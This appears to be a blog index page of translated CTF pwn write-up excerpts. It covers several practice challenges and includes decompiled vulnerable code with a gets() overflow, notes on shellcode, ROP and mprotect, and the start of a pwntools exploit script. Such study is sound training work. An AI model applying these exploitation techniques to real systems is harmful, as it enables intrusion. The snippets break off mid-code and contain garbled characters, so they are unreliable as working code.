Mr.Be1ieVe's Treasure

Though the road is long, keep walking and you will arrive; though the task is hard, keep at it and it will be done

babyheap_0ctf_2017

Reference writeup: https://blog.csdn.net/weixin_42151611/article/details/98119213?fp

ciscn_2019_s_9

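No protections are enabled at all, so shellcode is the first thing to consider. Also, the leak is only 50; only with a larger leak would going straight to ROP be considered. I tried ret2libc, but could not get it to work no matter what = = shellcode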

buu-ciscn_2019-c_1 WP

// local variable allocation has failed, the output may be wrong!
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [rsp+Ch] [rbp-4h]

  init(*(_QWORD *)&argc, argv, envp);
  puts("EEEEEEE hh iii ");
  puts("EE mm mm mmmm aa aa cccc hh nn nnn eee ");
  puts("EEEEE mmm mm mm aa aaa cc hhhhhh iii nnn nn ee e ");
  puts("EE mmm mm mm aa aaa cc hh hh

ciscn_2019_n_1 WP

int func()
{
  int result; // eax
  char v1; // [rsp+0h] [rbp-30h]
  float v2; // [rsp+2Ch] [rbp-4h]

  v2 = 0.0;
  puts("Let's guess the number.");
  gets(&v1);
  if ( v2 == 11.28125 )
    result = system("cat /flag");
  else
    result = puts("Its value should be 11.28125");
  return result;
}

Seeing the ==, I also tried ’a&rsqu

get_started_3dsctf_2016

mprotect function prototype:

int mprotect(void *addr, size_t len, int prot);

addr: start address of the memory
len: length of the memory to modify
prot: permissions of the memory

So the resulting exp:

from pwn import *
elf = ELF('./get_started_3dsctf_2016')
sh = elf.process()
#sh = remote('node3.buuoj.cn',27037)
pop3_ret = 0x804951D # so that later